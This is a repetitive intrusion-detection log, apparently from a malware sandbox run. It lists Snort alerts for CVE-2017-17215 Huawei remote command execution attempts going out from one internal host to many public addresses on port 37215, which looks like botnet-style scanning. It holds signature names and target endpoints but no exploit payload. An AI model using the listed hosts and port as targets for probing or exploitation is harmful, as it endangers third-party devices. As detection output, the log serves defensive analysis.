          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56212 -> 197.108.181.127:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56212 -> 197.108.181.127:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54192 -> 150.104.69.229:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54192 -> 150.104.69.229:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56486 -> 41.179.158.16:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56486 -> 41.179.158.16:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39566 -> 197.226.15.217:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39566 -> 197.226.15.217:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57810 -> 157.125.35.75:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57810 -> 157.125.35.75:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51458 -> 197.199.221.146:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51458 -> 197.199.221.146:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:32960 -> 41.213.7.117:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:32960 -> 41.213.7.117:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33028 -> 41.41.111.225:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33028 -> 41.41.111.225:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33094 -> 203.30.50.212:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33094 -> 203.30.50.212:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57218 -> 41.152.77.47:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57218 -> 41.152.77.47:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56740 -> 197.115.50.219:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56740 -> 197.115.50.219:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35286 -> 41.249.66.231:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35286 -> 41.249.66.231:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58310 -> 204.143.20.70:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58310 -> 204.143.20.70:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39822 -> 202.213.139.72:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39822 -> 202.213.139.72:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55990 -> 156.140.83.4:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55990 -> 156.140.83.4:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37232 -> 41.69.250.226:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37232 -> 41.69.250.226:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39074 -> 41.192.243.71:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39074 -> 41.192.243.71:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44464 -> 217.81.237.133:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:44464 -> 217.81.237.133:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56764 -> 41.1.165.81:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56764 -> 41.1.165.81:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58250 -> 197.199.21.55:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58250 -> 197.199.21.55:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50150 -> 41.237.254.184:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50150 -> 41.237.254.184:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40428 -> 157.29.141.235:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40428 -> 157.29.141.235:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52548 -> 41.213.47.74:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52548 -> 41.213.47.74:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38602 -> 157.248.136.195:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38602 -> 157.248.136.195:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49900 -> 157.147.162.141:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49900 -> 157.147.162.141:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38020 -> 96.59.61.64:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38020 -> 96.59.61.64:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41690 -> 157.61.194.101:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41690 -> 157.61.194.101:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33684 -> 157.156.60.243:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33684 -> 157.156.60.243:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34178 -> 197.97.187.172:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34178 -> 197.97.187.172:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35458 -> 41.173.85.115:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35458 -> 41.173.85.115:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:35484 -> 157.179.102.70:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:35484 -> 157.179.102.70:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34696 -> 157.238.137.243:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34696 -> 157.238.137.243:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58182 -> 197.201.212.85:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58182 -> 197.201.212.85:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37178 -> 157.192.167.156:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37178 -> 157.192.167.156:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38648 -> 197.235.85.137:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38648 -> 197.235.85.137:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50798 -> 41.176.11.237:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50798 -> 41.176.11.237:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46336 -> 157.112.7.141:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46336 -> 157.112.7.141:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48800 -> 157.47.87.135:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48800 -> 157.47.87.135:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58800 -> 197.27.167.157:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58800 -> 197.27.167.157:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39484 -> 197.96.111.20:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39484 -> 197.96.111.20:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48848 -> 41.175.184.115:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48848 -> 41.175.184.115:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:55258 -> 197.176.193.198:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:55258 -> 197.176.193.198:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39482 -> 124.52.233.176:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39482 -> 124.52.233.176:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:33090 -> 197.152.183.159:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:33090 -> 197.152.183.159:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60380 -> 157.248.99.185:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60380 -> 157.248.99.185:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41528 -> 49.88.113.187:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41528 -> 49.88.113.187:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37400 -> 197.29.88.247:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37400 -> 197.29.88.247:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49018 -> 157.30.141.192:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49018 -> 157.30.141.192:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:43940 -> 41.215.33.201:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:43940 -> 41.215.33.201:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:54076 -> 41.81.111.49:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:54076 -> 41.81.111.49:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57264 -> 157.64.168.87:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57264 -> 157.64.168.87:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59592 -> 157.217.217.33:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59592 -> 157.217.217.33:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51108 -> 41.64.55.104:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51108 -> 41.64.55.104:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56044 -> 157.228.94.5:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56044 -> 157.228.94.5:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40848 -> 197.140.202.101:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40848 -> 197.140.202.101:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41040 -> 189.84.251.110:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41040 -> 189.84.251.110:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46530 -> 157.103.216.227:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46530 -> 157.103.216.227:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50568 -> 157.75.210.108:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50568 -> 157.75.210.108:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58820 -> 157.82.118.165:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58820 -> 157.82.118.165:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:53202 -> 148.234.42.141:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:53202 -> 148.234.42.141:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56254 -> 197.115.60.78:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56254 -> 197.115.60.78:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52692 -> 119.193.17.67:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52692 -> 119.193.17.67:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58396 -> 41.155.61.99:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58396 -> 41.155.61.99:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60200 -> 157.207.244.138:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60200 -> 157.207.244.138:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56646 -> 197.208.93.80:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56646 -> 197.208.93.80:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47048 -> 197.17.216.160:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47048 -> 197.17.216.160:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:34798 -> 41.142.63.153:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:34798 -> 41.142.63.153:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40594 -> 41.169.112.29:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40594 -> 41.169.112.29:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48956 -> 197.150.35.57:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48956 -> 197.150.35.57:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:40826 -> 73.13.32.65:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40826 -> 73.13.32.65:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:47828 -> 157.209.164.19:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:47828 -> 157.209.164.19:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57046 -> 197.210.134.33:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57046 -> 197.210.134.33:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:52578 -> 197.247.122.1:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:52578 -> 197.247.122.1:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:56346 -> 41.252.239.78:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:56346 -> 41.252.239.78:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:46426 -> 99.118.121.186:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:46426 -> 99.118.121.186:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:57624 -> 156.102.160.253:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:57624 -> 156.102.160.253:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58072 -> 157.39.27.71:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58072 -> 157.39.27.71:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48304 -> 197.184.154.236:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48304 -> 197.184.154.236:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49698 -> 150.221.57.180:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49698 -> 150.221.57.180:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:50216 -> 101.158.98.20:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:50216 -> 101.158.98.20:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59170 -> 157.79.31.249:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59170 -> 157.79.31.249:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:36818 -> 161.209.166.90:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:36818 -> 161.209.166.90:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:60202 -> 157.247.83.123:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:60202 -> 157.247.83.123:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:49938 -> 157.209.250.31:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:49938 -> 157.209.250.31:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48742 -> 157.207.113.155:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48742 -> 157.207.113.155:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:59160 -> 197.246.134.104:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:59160 -> 197.246.134.104:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:37998 -> 157.106.179.186:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:37998 -> 157.106.179.186:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48998 -> 41.208.124.53:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48998 -> 41.208.124.53:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:45822 -> 197.94.125.45:37215
          Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:45822 -> 197.94.125.45:37215
          Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:44768 -> 157.180.179.145:37215
